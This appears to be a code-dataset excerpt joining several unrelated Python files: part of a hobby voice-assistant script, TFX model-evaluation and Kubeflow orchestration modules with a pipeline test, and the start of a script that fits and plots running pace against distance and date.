elif 'how are you' in query:
speak("I am fine, Thank you")
speak("How are you, Sir")
elif 'fine' in query or "good" in query:
speak("It's good to know that your fine")
elif 'exit' in query or 'stop' in query:
speak("Thanks for giving me your time")
exit()
elif 'search' in query or 'play' in query:
query = query.replace("search", "")
query = query.replace("play", "")
webbrowser.open(query)
elif "who i am" in query:
speak("If you can talk then definitely your human.")
elif "why you came to world" in query:
speak("Thanks to Jibon. further It's a secret")
elif ai_name in query:
wishMe()
speak(f"{ai_name} 1 point o in your service Mister")
elif "can you help me" in query:
speak("of course sir, it is my pleasure")
elif "my favourite song" in query:
speak("your favourite song is mood")
elif 'hi' in query:
speak('hello sir')
elif 'rotate the screen' in query:
speak('ok sir')
screen = rotatescreen.get_primary_display()
for i in range(13):
time.sleep(1)
screen.rotate_to(i * 90 % 360)
elif 'what is your name' in query:
speak('My friends call me')
speak(ai_name)
elif 'exit' in query or 'close' in query:
speak('Thanks for giving me your time')
exit()
elif 'say whatever i write' in query:
while True:
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[1].id)
text = input('Say something:')
engine.say(text)
engine.runAndWait()
if 'stop' in text:
exit()
elif 'exit' in text:
exit()
elif 'my songs' in query:
        speak('Here you go with music')
music_dir = 'links'
songs = os.listdir(music_dir)
print(songs)
random = os.startfile(os.path.join(music_dir, songs[0]))
elif 'reason for you' in query.lower():
speak("I was created as the first big project by <NAME>")
elif 'how to hack' in query:
speak("no sir, you didn't programmed me to do these things")
elif 'good morning' in query:
speak('Good morning sir')
elif 'i love you' in query:
speak("It's hard to understand")
elif 'is love' in query:
        speak('It is the 7th sense that destroys all other senses')
elif "why you came to world" in query:
speak("Thanks to Jibon. further It's a secret")
elif 'want to change your name' in query:
speak('If you want to change my name you have to go to the variable section and change the ai name.')
elif 'think about love' in query:
        speak('Love is a useless thing. It will destroy your life')
elif 'where is my home' in query:
speak(f'Your home is in {home}')
elif 'i live' in query:
speak(f'You live in {live_in}')
elif 'know hacking' in query:
speak("No, I don't")
elif 'pdf reader' in query:
speak('opening pdf reader')
book = open("name.pdf", "rb")
pdfReader = PyPDF2.PdfFileReader(book)
pages = pdfReader.numPages
print(pages)
elif 'open spell checker' in query:
a = input("Input text:")
print('Your word:' + str(a))
b = TextBlob(a)
print('Corrected text:' + str(b.correct()))
elif 'system information' in query:
myS = platform.uname()
print(f'System: {myS.system}')
print(f'Node name: {myS.node}')
print(f'Release: {myS.release}')
print(f'Version: {myS.version}')
print(f'Machine: {myS.machine}')
print(f'Processor: {myS.processor}')
elif 'a pattern' in query:
def pattern(n):
for i in range(n):
print((i+1)*'*')
for i in range(n-1,0,-1):
print(i*'*')
pattern(5)
elif 'open calendar' in query:
try:
speak('tell me the number of the year')
y = int(takeCommand())
speak('Tell me the number of the month')
m = int(takeCommand())
print(calendar.month(y, m))
except Exception as e:
print(e)
speak("Sorry sir, I didn't understand")
elif 'cowsay' in query:
cowsay.daemon(input('Enter word:'))
elif 'record voice' in query:
fs = 44100
sc = int(input("Enter the duration in seconds: "))
print("Recording...\n")
recordVoice = sounddevice.rec(int(sc * fs),samplerate = fs, channels = 2)
sounddevice.wait()
write("out.wav",fs,recordVoice)
print("Finished...\nPlease check it")
elif 'check the internet speed' in query:
st = Speedtest()
speak("Checking speed....")
print("Your connection's download speed is:", st.download())
speak("Your connection's download speed is:" + str(st.download()))
print("Your connection's upload speed is:", st.upload())
speak("Your connection's upload speed is:" + str(st.upload()))
elif "check battery percentage" in query:
battery = psutil.sensors_battery()
percent = str(battery.percent)
print("Your battery is running on "+percent+"% battery level")
speak("Your battery is running on "+percent+"% battery level")
elif "open obs" in query:
os.startfile("C:\\Program Files\\obs-studio\\bin\\64bit\\obs64.exe")
elif 'open canva' in query:
os.startfile("C:\\Users\\Dinesh\\AppData\\Local\\Programs\\Canva\\Canva.exe")
else:
pass
``` |
{
"source": "JibranKalia/tfx",
"score": 2
} |
#### File: components/evaluator/executor.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import apache_beam as beam
import tensorflow as tf
import tensorflow_model_analysis as tfma
from typing import Any, Dict, List, Text
from google.protobuf import json_format
from tfx import types
from tfx.components.base import base_executor
from tfx.proto import evaluator_pb2
from tfx.types import artifact_utils
from tfx.utils import io_utils
from tfx.utils import path_utils
class Executor(base_executor.BaseExecutor):
"""Generic TFX model evaluator executor."""
def _get_slice_spec_from_feature_slicing_spec(
self, spec: evaluator_pb2.FeatureSlicingSpec
) -> List[tfma.slicer.SingleSliceSpec]:
"""Given a feature slicing spec, returns a List of SingleSliceSpecs.
Args:
spec: slice specification.
Returns:
List of corresponding SingleSliceSpecs. Always includes the overall slice,
even if it was not specified in the given spec.
"""
result = []
for single_spec in spec.specs:
columns = single_spec.column_for_slicing
result.append(tfma.slicer.SingleSliceSpec(columns=columns))
# Always include the overall slice.
if tfma.slicer.SingleSliceSpec() not in result:
result.append(tfma.slicer.SingleSliceSpec())
return result
def Do(self, input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
"""Runs a batch job to evaluate the eval_model against the given input.
Args:
input_dict: Input dict from input key to a list of Artifacts.
- model_exports: exported model.
- examples: examples for eval the model.
output_dict: Output dict from output key to a list of Artifacts.
- output: model evaluation results.
exec_properties: A dict of execution properties.
- feature_slicing_spec: JSON string of evaluator_pb2.FeatureSlicingSpec
instance, providing the way to slice the data.
Returns:
None
"""
if 'model_exports' not in input_dict:
raise ValueError('\'model_exports\' is missing in input dict.')
if 'examples' not in input_dict:
raise ValueError('\'examples\' is missing in input dict.')
if 'output' not in output_dict:
raise ValueError('\'output\' is missing in output dict.')
self._log_startup(input_dict, output_dict, exec_properties)
# Extract input artifacts
model_exports_uri = artifact_utils.get_single_uri(
input_dict['model_exports'])
feature_slicing_spec = evaluator_pb2.FeatureSlicingSpec()
json_format.Parse(exec_properties['feature_slicing_spec'],
feature_slicing_spec)
slice_spec = self._get_slice_spec_from_feature_slicing_spec(
feature_slicing_spec)
output_uri = artifact_utils.get_single_uri(output_dict['output'])
eval_model_path = path_utils.eval_model_path(model_exports_uri)
tf.logging.info('Using {} for model eval.'.format(eval_model_path))
eval_shared_model = tfma.default_eval_shared_model(
eval_saved_model_path=eval_model_path)
tf.logging.info('Evaluating model.')
with beam.Pipeline(argv=self._get_beam_pipeline_args()) as pipeline:
# pylint: disable=expression-not-assigned
(pipeline
| 'ReadData' >> beam.io.ReadFromTFRecord(
file_pattern=io_utils.all_files_pattern(
artifact_utils.get_split_uri(input_dict['examples'], 'eval')))
|
'ExtractEvaluateAndWriteResults' >> tfma.ExtractEvaluateAndWriteResults(
eval_shared_model=eval_shared_model,
slice_spec=slice_spec,
output_path=output_uri))
tf.logging.info(
'Evaluation complete. Results written to {}.'.format(output_uri))
```
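For reference, `exec_properties['feature_slicing_spec']` arrives as a JSON-serialized `evaluator_pb2.FeatureSlicingSpec`, as the docstring above states. The snippet below is a hedged illustration of what that payload looks like and how it is parsed, assuming this version of `tfx` is installed; the column name `trip_start_hour` is only an example.
```python
from google.protobuf import json_format
from tfx.proto import evaluator_pb2

# Example payload: slice metrics by one column (the column name is illustrative).
feature_slicing_spec_json = '{"specs": [{"column_for_slicing": ["trip_start_hour"]}]}'

spec = evaluator_pb2.FeatureSlicingSpec()
json_format.Parse(feature_slicing_spec_json, spec)

# _get_slice_spec_from_feature_slicing_spec() would turn this into a
# SingleSliceSpec for the column plus the always-included overall slice.
print(spec)
```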
#### File: airflow_workshop/notebooks/tfx_utils.py
```python
import os
import time
import papermill as pm
import tensorflow_data_validation as tfdv
import tensorflow_model_analysis as tfma
import utils
from ml_metadata.metadata_store import metadata_store
from ml_metadata.proto import metadata_store_pb2
class TFXArtifactTypes(object):
"""Constants for different TFX artifact type names."""
EXAMPLES = 'ExamplesPath'
SCHEMA = 'SchemaPath'
EXAMPLE_STATS = 'ExampleStatisticsPath'
EXAMPLE_VALIDATION = 'ExampleValidationPath'
TRANSFORMED_EXAMPLES = 'TransformPath'
MODEL = 'ModelExportPath'
MODEL_EVAL = 'ModelEvalPath'
class TFXExecutionTypes(object):
"""Constants for different TFX execution type names."""
EXAMPLE_GEN = 'examples_gen'
STATISTICS_GEN = 'statistics_gen'
SCHEMA_GEN = 'schema_gen'
EXAMPLE_VALIDATION = 'example_validation'
TRANSFORM = 'transform'
TRAINER = 'trainer'
EVALUATOR = 'evaluator'
class TFXReadonlyMetadataStore(utils.ReadonlyMetadataStore):
"""A TFX ml-metadata store that provides read-only methods for notebooks."""
@staticmethod
def from_sqlite_db(filename_uri):
"""Returns a `TFXReadonlyMetadataStore` based off a SQLITE db uri.
Args:
filename_uri: A `str` indicating the path to the SQLITE db.
Returns:
A `TFXReadonlyMetadataStore` based off a SQLITE db uri.
"""
c = metadata_store_pb2.ConnectionConfig()
c.sqlite.filename_uri = filename_uri
return TFXReadonlyMetadataStore(metadata_store.MetadataStore(c))
def display_tfma_analysis(self, model_id, slicing_column=None):
"""Displays TFMA metrics for `model_id` sliced by `slicing_column`.
Args:
model_id: A `int` indicating the id of a `TFXArtifactTypes.MODEL` artifact
slicing_column: (Optional) A `str` indicating the slicing column for
the TFMA metrics.
Returns:
A SlicingMetricsViewer object if in Jupyter notebook; None if in Colab.
"""
tfma_artifact = self.get_dest_artifact_of_type(
model_id, TFXArtifactTypes.MODEL_EVAL)
if tfma_artifact:
return tfma.view.render_slicing_metrics(
tfma.load_eval_result(tfma_artifact.uri),
slicing_column=slicing_column)
def compare_tfma_analysis(self, model_id, other_model_id):
"""Compares TFMA metrics for `model_id` and `other_model_id`.
Args:
model_id: A `int` indicating the id of a `TFXArtifactTypes.MODEL` artifact
other_model_id: A `int` indicating the id of another
`TFXArtifactTypes.MODEL` artifact.
Returns:
A TimeSeriesViewer object if in Jupyter notebook; None if in Colab.
"""
tfma_artifact, other_tfma_artifact = (
self.get_dest_artifact_of_type(model_id, TFXArtifactTypes.MODEL_EVAL),
self.get_dest_artifact_of_type(other_model_id,
TFXArtifactTypes.MODEL_EVAL)
)
if tfma_artifact and other_tfma_artifact:
eval_results = tfma.make_eval_results(
[
tfma.load_eval_result(tfma_artifact.uri),
tfma.load_eval_result(other_tfma_artifact.uri)
], tfma.constants.MODEL_CENTRIC_MODE)
return tfma.view.render_time_series(
eval_results, tfma.slicer.slicer.SingleSliceSpec())
def display_stats_for_examples(self, examples_id):
"""Displays stats for `examples_id`.
Args:
examples_id: A `int` indicating the id of a `TFXArtifactTypes.EXAMPLES`
artifact.
"""
stats_artifact = self.get_dest_artifact_of_type(
examples_id, TFXArtifactTypes.EXAMPLE_STATS)
if stats_artifact:
tfdv.visualize_statistics(
tfdv.load_statistics(os.path.join(stats_artifact.uri,
'stats_tfrecord')))
def compare_stats_for_examples(self, examples_id, other_examples_id,
name='', other_name=''):
"""Compares stats for `examples_id` and `other_examples_id`.
Args:
examples_id: A `int` indicating the id of one `TFXArtifactTypes.EXAMPLES`
artifact.
other_examples_id: A `int` indicating the id of another
`TFXArtifactTypes.EXAMPLES` artifact.
name: (Optional) A `str` indicating the label to use for stats of
`examples_id`.
other_name: (Optional) A `str` indicating the label to use for stats of
`other_examples_id`.
"""
stats_artifact, other_stats_artifact = (
self.get_dest_artifact_of_type(
examples_id, TFXArtifactTypes.EXAMPLE_STATS),
self.get_dest_artifact_of_type(
other_examples_id, TFXArtifactTypes.EXAMPLE_STATS)
)
if stats_artifact and other_stats_artifact:
tfdv.visualize_statistics(
tfdv.load_statistics(stats_artifact.uri),
rhs_statistics=tfdv.load_statistics(other_stats_artifact.uri),
lhs_name=name, rhs_name=other_name)
def display_examples_stats_for_model(self, model_id):
"""Displays stats for examples used to train `model_id`."""
examples_artifact = self.get_source_artifact_of_type(
model_id, TFXArtifactTypes.EXAMPLES)
if examples_artifact:
self.display_stats_for_examples(examples_artifact.id)
def compare_examples_stats_for_models(self, model_id, other_model_id):
"""Compares stats for examples to train `model_id` & `other_model_id`."""
examples_artifact, other_examples_artifact = (
self.get_source_artifact_of_type(model_id, TFXArtifactTypes.EXAMPLES),
self.get_source_artifact_of_type(
other_model_id, TFXArtifactTypes.EXAMPLES)
)
if examples_artifact and other_examples_artifact:
self.compare_stats_for_examples(
examples_artifact.id, other_examples_artifact.id,
name='model_'+str(model_id), other_name='model_'+str(other_model_id))
def display_tensorboard(self, model_id, *other_model_ids):
"""Returns a Tensorboard link for `model_id` and `other_model_ids`.
Args:
model_id: A `int` indicating the id of a `TFXArtifactTypes.MODEL`
artifact.
*other_model_ids: (Optional) A list of `int` indicating the ids of other
`TFXArtifactTypes.MODEL` artifacts to also include in the Tensorboard
invocation for comparison.
"""
model_ids = [model_id] + list(other_model_ids)
model_artifacts = self.metadata_store.get_artifacts_by_id(model_ids)
model_ids_str = '-'.join([str(m) for m in model_ids])
log_file = os.path.join(
os.environ['HOME'],
'tensorboard_model_{}_log.txt'.format(model_ids_str),
)
output_notebook_path = os.path.join(
os.environ['HOME'],
'spawn_tensorboard_{}_output.ipynb'.format(model_ids_str),
)
tensorboard_logdir = ','.join([
'model_{}:{}'.format(m.id, m.uri) for m in model_artifacts
])
pm.execute_notebook(
'spawn_tensorboard.ipynb',
output_notebook_path,
parameters=dict(tb_logdir=tensorboard_logdir, tb_run_log=log_file),
progress_bar=False)
time.sleep(5) # Give it some time for log_filename to be flushed.
with open(log_file) as f:
for l in f:
if 'TensorBoard' in l:
# "TensorBoard 1.12.2 at http://... (Press CTRL+C to quit)"
return l.split(' ')[3]
```
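A minimal usage sketch of the store above, as it might be run from a notebook; the database path, artifact ids, and slicing column are hypothetical and depend on the actual pipeline run.
```python
from tfx_utils import TFXReadonlyMetadataStore  # assumes this module is on the notebook's path

store = TFXReadonlyMetadataStore.from_sqlite_db('/path/to/pipeline/metadata.sqlite')  # hypothetical path

# Visualize statistics for one ExamplesPath artifact and TFMA metrics for one model
# (the artifact ids 1 and 2 and the slicing column are placeholders).
store.display_stats_for_examples(examples_id=1)
store.display_tfma_analysis(model_id=2, slicing_column='trip_start_hour')
```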
#### File: examples/chicago_taxi/chicago_taxi_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from tensorflow.python.lib.io import file_io # pylint: disable=g-direct-tensorflow-import
from tfx.examples.chicago_taxi import preprocess
from tfx.examples.chicago_taxi import process_tfma
from tfx.examples.chicago_taxi import tfdv_analyze_and_validate
from tfx.examples.chicago_taxi.trainer import task as trainer_task
_DATA_DIR_PATH = os.path.join(os.path.dirname(__file__), 'data')
_TRAINER_OUTPUT_DIR = 'train_output'
_TRAIN_DATA_FILE_PREFIX = 'transformed_train_data'
_EVAL_DATA_FILE_PREFIX = 'transformed_eval_data'
class TaxiTest(tf.test.TestCase):
"""Unit test for taxi util."""
def setUp(self):
super(TaxiTest, self).setUp()
self._working_dir = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self._testMethodName)
file_io.recursive_create_dir(self._working_dir)
def testPipeline(self):
# TODO(b/113256925): Split this test to test preprocess and training
# separately. Possibly using tft_unit to test the result of transform_data.
stats_file = os.path.join(self._working_dir, 'train_stats')
tfdv_analyze_and_validate.compute_stats(
input_handle=os.path.join(_DATA_DIR_PATH, 'train/data.csv'),
stats_path=stats_file)
schema_file = os.path.join(self._working_dir, 'schema.pbtxt')
tfdv_analyze_and_validate.infer_schema(stats_file, schema_file)
transform_output_path = os.path.join(self._working_dir, 'transform_output')
preprocess.transform_data(
os.path.join(_DATA_DIR_PATH, 'train/data.csv'),
outfile_prefix=_TRAIN_DATA_FILE_PREFIX,
working_dir=transform_output_path,
schema_file=schema_file)
preprocess.transform_data(
input_handle=os.path.join(_DATA_DIR_PATH, 'eval/data.csv'),
outfile_prefix=_EVAL_DATA_FILE_PREFIX,
working_dir=transform_output_path,
transform_dir=transform_output_path,
schema_file=schema_file)
hparams = tf.contrib.training.HParams(
train_steps=100,
eval_steps=50,
job_dir=self._working_dir,
output_dir=os.path.join(self._working_dir, _TRAINER_OUTPUT_DIR),
tf_transform_dir=transform_output_path,
train_files=os.path.join(transform_output_path,
'{}-*'.format(_TRAIN_DATA_FILE_PREFIX)),
eval_files=os.path.join(transform_output_path,
'{}-*'.format(_EVAL_DATA_FILE_PREFIX)),
schema_file=schema_file)
# TODO(b/113256925): Test the result of run_experiment.
trainer_task.run_experiment(hparams)
# Find where Trainer wrote the eval model
eval_model_dir = os.path.join(self._working_dir, _TRAINER_OUTPUT_DIR,
trainer_task.EVAL_MODEL_DIR)
# Appends the directory name where the model was exported to (some number).
eval_model_dir = os.path.join(eval_model_dir, os.listdir(eval_model_dir)[0])
# The data under eval_model was produced by test_train.
# TODO(b/113256925): Test the result of process_tfma.
process_tfma.process_tfma(
eval_result_dir=self._working_dir,
input_csv=os.path.join(_DATA_DIR_PATH, 'eval/data.csv'),
eval_model_dir=eval_model_dir,
schema_file=schema_file)
if __name__ == '__main__':
tf.test.main()
```
#### File: tfx/orchestration/component_launcher.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf
from typing import Any, Dict, List, Text, Type
from ml_metadata.proto import metadata_store_pb2
from tfx import types
from tfx.components.base import base_component
from tfx.components.base import base_driver
from tfx.components.base import base_executor
from tfx.components.base import executor_spec
from tfx.orchestration import data_types
from tfx.orchestration import metadata
from tfx.orchestration import publisher
class BaseComponentLauncher(object):
"""Responsible for launching driver, executor and publisher of component."""
# pyformat: disable
def __init__(self, component_info: data_types.ComponentInfo,
driver_class: Type[base_driver.BaseDriver],
component_executor_spec: executor_spec.ExecutorSpec,
input_dict: Dict[Text, types.Channel],
output_dict: Dict[Text, types.Channel],
exec_properties: Dict[Text, Any],
pipeline_info: data_types.PipelineInfo,
driver_args: data_types.DriverArgs,
metadata_connection_config: metadata_store_pb2.ConnectionConfig,
additional_pipeline_args: Dict[Text, Any]):
# pyformat: enable
"""Initialize a ComponentLauncher.
Args:
component_info: ComponentInfo of the component.
driver_class: The driver class to run for this component.
component_executor_spec: The executor spec to specify what to execute
when launching this component.
input_dict: Dictionary of input artifacts consumed by this component.
output_dict: Dictionary of output artifacts produced by this component.
exec_properties: Dictionary of execution properties.
pipeline_info: An instance of data_types.PipelineInfo that holds pipeline
properties.
driver_args: An instance of data_types.DriverArgs that holds component
specific driver args.
metadata_connection_config: ML metadata connection config.
additional_pipeline_args: Additional pipeline args, includes,
- beam_pipeline_args: Beam pipeline args for beam jobs within executor.
Executor will use beam DirectRunner as Default.
"""
self._pipeline_info = pipeline_info
self._component_info = component_info
self._driver_args = driver_args
self._driver_class = driver_class
self._component_executor_spec = component_executor_spec
self._input_dict = input_dict
self._output_dict = output_dict
self._exec_properties = exec_properties
self._metadata_connection_config = metadata_connection_config
self._additional_pipeline_args = additional_pipeline_args
def _run_driver(self, input_dict: Dict[Text, types.Channel],
output_dict: Dict[Text, types.Channel],
exec_properties: Dict[Text, Any]
) -> data_types.ExecutionDecision:
"""Prepare inputs, outputs and execution properties for actual execution."""
tf.logging.info('Run driver for %s', self._component_info.component_id)
with metadata.Metadata(self._metadata_connection_config) as m:
driver = self._driver_class(metadata_handler=m)
execution_decision = driver.pre_execution(
input_dict=input_dict,
output_dict=output_dict,
exec_properties=exec_properties,
driver_args=self._driver_args,
pipeline_info=self._pipeline_info,
component_info=self._component_info)
return execution_decision
# TODO(jyzhao): consider returning an execution result.
def _run_executor(self, execution_id: int,
input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]],
exec_properties: Dict[Text, Any]) -> None:
"""Execute underlying component implementation."""
tf.logging.info('Run executor for %s', self._component_info.component_id)
executor_context = base_executor.BaseExecutor.Context(
beam_pipeline_args=self._additional_pipeline_args.get(
'beam_pipeline_args'),
tmp_dir=os.path.join(self._pipeline_info.pipeline_root, '.temp', ''),
unique_id=str(execution_id))
    # TODO(hongyes): move this check to a specific method which can be
    # overridden by subclasses.
if not isinstance(self._component_executor_spec,
executor_spec.ExecutorClassSpec):
raise TypeError(
'component_executor_spec must be an instance of ExecutorClassSpec.')
# Type hint of component will cause not-instantiable error as
# ExecutorClassSpec.executor_class is Type[BaseExecutor] which has an
# abstract function.
executor = self._component_executor_spec.executor_class(
executor_context) # type: ignore
executor.Do(input_dict, output_dict, exec_properties)
def _run_publisher(self, use_cached_results: bool, execution_id: int,
input_dict: Dict[Text, List[types.Artifact]],
output_dict: Dict[Text, List[types.Artifact]]) -> None:
"""Publish execution result to ml metadata."""
tf.logging.info('Run publisher for %s', self._component_info.component_id)
with metadata.Metadata(self._metadata_connection_config) as m:
p = publisher.Publisher(metadata_handler=m)
p.publish_execution(
execution_id=execution_id,
input_dict=input_dict,
output_dict=output_dict,
use_cached_results=use_cached_results)
def launch(self) -> int:
"""Execute the component, includes driver, executor and publisher.
Returns:
The execution id of the launch.
"""
execution_decision = self._run_driver(self._input_dict, self._output_dict,
self._exec_properties)
if not execution_decision.use_cached_results:
self._run_executor(execution_decision.execution_id,
execution_decision.input_dict,
execution_decision.output_dict,
execution_decision.exec_properties)
self._run_publisher(execution_decision.use_cached_results,
execution_decision.execution_id,
execution_decision.input_dict,
execution_decision.output_dict)
return execution_decision.execution_id
# TODO(ajaygopinathan): Combine with BaseComponentLauncher once we either:
# - have a way to serialize/deserialize components, or
# - have a clean way to use factory methods to create this class.
class ComponentLauncher(BaseComponentLauncher):
"""Responsible for launching driver, executor and publisher of component.
Convenient subclass when given a concrete component to launch.
"""
def __init__(self, component: base_component.BaseComponent,
pipeline_info: data_types.PipelineInfo,
driver_args: data_types.DriverArgs,
metadata_connection_config: metadata_store_pb2.ConnectionConfig,
additional_pipeline_args: Dict[Text, Any]):
"""Initialize a ComponentLauncher.
Args:
component: The component to launch.
pipeline_info: An instance of data_types.PipelineInfo that holds pipeline
properties.
driver_args: An instance of data_types.DriverArgs that holds component
specific driver args.
metadata_connection_config: ML metadata connection config.
additional_pipeline_args: Additional pipeline args, includes,
- beam_pipeline_args: Beam pipeline args for beam jobs within executor.
Executor will use beam DirectRunner as Default.
"""
component_info = data_types.ComponentInfo(
component_type=component.component_type,
component_id=component.component_id)
super(ComponentLauncher, self).__init__(
component_info=component_info,
driver_class=component.driver_class,
component_executor_spec=component.executor_spec,
input_dict=component.inputs.get_all(),
output_dict=component.outputs.get_all(),
exec_properties=component.exec_properties,
pipeline_info=pipeline_info,
driver_args=driver_args,
metadata_connection_config=metadata_connection_config,
additional_pipeline_args=additional_pipeline_args)
```
#### File: orchestration/kubeflow/container_entrypoint.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import json
import logging
import os
import sys
import tensorflow as tf
from typing import Any, Dict, Text
from ml_metadata.proto import metadata_store_pb2
from tfx.orchestration import component_launcher
from tfx.orchestration import data_types
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.types import artifact_utils
from tfx.types import channel
from tfx.utils import import_utils
from tfx.utils import json_utils
from google.protobuf import json_format
def _get_config_value(config_value: kubeflow_pb2.ConfigValue) -> Text:
value_from = config_value.WhichOneof('value_from')
if value_from is None:
raise ValueError('No value set in config value: {}'.format(config_value))
if value_from == 'value':
return config_value.value
return os.getenv(config_value.environment_variable)
# TODO(ajaygopinathan): Add unit tests for these helper functions.
def _get_metadata_connection_config(
kubeflow_metadata_config: kubeflow_pb2.KubeflowMetadataConfig
) -> metadata_store_pb2.ConnectionConfig:
"""Constructs a metadata connection config.
Args:
kubeflow_metadata_config: Configuration parameters to use for constructing a
valid metadata connection config in a Kubeflow cluster.
Returns:
A metadata_store_pb2.ConnectionConfig object.
"""
connection_config = metadata_store_pb2.ConnectionConfig()
connection_config.mysql.host = _get_config_value(
kubeflow_metadata_config.mysql_db_service_host)
connection_config.mysql.port = int(
_get_config_value(kubeflow_metadata_config.mysql_db_service_port))
connection_config.mysql.database = _get_config_value(
kubeflow_metadata_config.mysql_db_name)
connection_config.mysql.user = _get_config_value(
kubeflow_metadata_config.mysql_db_user)
connection_config.mysql.password = _get_config_value(
kubeflow_metadata_config.mysql_db_password)
return connection_config
def _make_channel_dict(artifact_dict: Dict[Text, Text]
) -> Dict[Text, channel.Channel]:
"""Makes a dictionary of artifact channels from a dictionary of artifacts.
Args:
artifact_dict: Dictionary of artifacts.
Returns:
Dictionary of artifact channels.
Raises:
RuntimeError: If list of artifacts is malformed.
"""
channel_dict = {}
for name, artifact_list in artifact_dict.items():
if not artifact_list:
raise RuntimeError(
'Found empty list of artifacts for input/output named {}: {}'.format(
name, artifact_list))
type_name = artifact_list[0].type_name
channel_dict[name] = channel.Channel(
type_name=type_name, artifacts=artifact_list)
return channel_dict
def _make_additional_pipeline_args(json_additional_pipeline_args: Text
) -> Dict[Text, Any]:
"""Constructs additional_pipeline_args for ComponentLauncher.
Currently, this mainly involves parsing and constructing `beam_pipeline_args`.
Args:
json_additional_pipeline_args: JSON serialized dictionary of additional
pipeline args.
Returns:
Dictionary containing `additional_pipeline_args`.
"""
additional_pipeline_args = json.loads(json_additional_pipeline_args)
# Ensure beam pipelines args has a setup.py file so we can use
# DataflowRunner.
beam_pipeline_args = additional_pipeline_args.get('beam_pipeline_args', [])
module_dir = os.environ['TFX_SRC_DIR']
setup_file = os.path.join(module_dir, 'setup.py')
tf.logging.info('Using setup_file \'%s\' to capture TFX dependencies',
setup_file)
beam_pipeline_args.append('--setup_file={}'.format(setup_file))
additional_pipeline_args['beam_pipeline_args'] = beam_pipeline_args
return additional_pipeline_args
def main():
# Log to the container's stdout so Kubeflow Pipelines UI can display logs to
# the user.
logging.basicConfig(stream=sys.stdout, level=logging.INFO)
logging.getLogger().setLevel(logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('--pipeline_name', type=str, required=True)
parser.add_argument('--pipeline_root', type=str, required=True)
parser.add_argument('--kubeflow_metadata_config', type=str, required=True)
parser.add_argument('--additional_pipeline_args', type=str, required=True)
parser.add_argument('--component_id', type=str, required=True)
parser.add_argument('--component_type', type=str, required=True)
parser.add_argument('--driver_class_path', type=str, required=True)
parser.add_argument('--executor_spec', type=str, required=True)
parser.add_argument('--inputs', type=str, required=True)
parser.add_argument('--outputs', type=str, required=True)
parser.add_argument('--exec_properties', type=str, required=True)
parser.add_argument('--enable_cache', action='store_true')
args = parser.parse_args()
inputs = artifact_utils.parse_artifact_dict(args.inputs)
input_dict = _make_channel_dict(inputs)
outputs = artifact_utils.parse_artifact_dict(args.outputs)
output_dict = _make_channel_dict(outputs)
exec_properties = json.loads(args.exec_properties)
driver_class = import_utils.import_class_by_path(args.driver_class_path)
executor_spec = json_utils.loads(args.executor_spec)
kubeflow_metadata_config = kubeflow_pb2.KubeflowMetadataConfig()
json_format.Parse(args.kubeflow_metadata_config, kubeflow_metadata_config)
connection_config = _get_metadata_connection_config(kubeflow_metadata_config)
component_info = data_types.ComponentInfo(
component_type=args.component_type, component_id=args.component_id)
driver_args = data_types.DriverArgs(enable_cache=args.enable_cache)
additional_pipeline_args = _make_additional_pipeline_args(
args.additional_pipeline_args)
launcher = component_launcher.BaseComponentLauncher(
component_info=component_info,
driver_class=driver_class,
component_executor_spec=executor_spec,
input_dict=input_dict,
output_dict=output_dict,
exec_properties=exec_properties,
pipeline_info=data_types.PipelineInfo(
pipeline_name=args.pipeline_name,
pipeline_root=args.pipeline_root,
run_id=os.environ['WORKFLOW_ID']),
driver_args=driver_args,
metadata_connection_config=connection_config,
additional_pipeline_args=additional_pipeline_args)
launcher.launch()
if __name__ == '__main__':
main()
``` |
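Note that `main()` expects `--inputs`, `--outputs`, and `--exec_properties` to be JSON strings and reads the run id from the `WORKFLOW_ID` environment variable, so the container must be launched with all of those supplied by the Kubeflow pipeline definition.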
{
"source": "JibRay/runsPlot",
"score": 3
} |
#### File: JibRay/runsPlot/runsPlot.py
```python
from mpl_toolkits import mplot3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm
#from matplotlib.ticker import LinearLocator, FormatStrFormatter
import argparse
import datetime
from datetime import date
#============================================================================
# Globals
version = 4
#Input file field index values.
TYPE = 0
TIME_STAMP = 1
DISTANCE = 4
TIME = 6
#============================================================================
# Classes
# A class to hold a run event.
class Event:
def __init__(self, _timeStamp, _distance, _pace):
self.timeStamp = _timeStamp # date.
self.day = 0 # Day count from first run.
self.distance = _distance # In miles.
self.pace = _pace # In minutes per mile.
# A class to hold all the runs.
class Runs:
def __init__(self):
self.inputEvents = np.array([], dtype = Event)
self.day = []
self.distance = []
self.pace = []
def length(self):
return len(self.inputEvents)
# For each run in the file at path, load date, distance and pace. Pace is
# computed from distance and time.
def load(self, path):
values = []
self.__init__()
with open(path) as inputFile:
# Skip the header line.
inputFile.readline()
for line in inputFile:
text = self.removeQuotesAndCommas(line)
values = text.split(',')
# Load only running events.
if values[TYPE] == 'Running':
# From values, get date, distance in miles.
runDate = date.fromisoformat(values[TIME_STAMP].split()[0])
runDistance = float(values[DISTANCE])
# To get run pace, first convert time (hh:mm:ss) to minutes, then
# compute pace (minutes/mile).
h, m, s = values[TIME].split(':')
t = 60.0 * float(h) + float(m) + (float(s) / 60.0)
runPace = t / runDistance
# Exclude outliers.
if runDistance >= 2.0 and runDistance <= 27.0 \
and runPace > 4.0 and runPace < 20.0:
self.inputEvents = np.append(self.inputEvents, \
Event(runDate, runDistance, runPace))
        # Compute the day numbers.
firstDay = self.inputEvents[len(self.inputEvents) - 1].timeStamp
for event in self.inputEvents:
event.day = (event.timeStamp - firstDay).days
def fitPlane(self):
# Create the arrays needed for the fit.
self.day = []
self.distance = []
self.pace = []
for event in self.inputEvents:
self.day.append(event.day);
self.distance.append(event.distance);
self.pace.append(event.pace);
tmp_A = []
tmp_b = []
for i in range(len(self.day)):
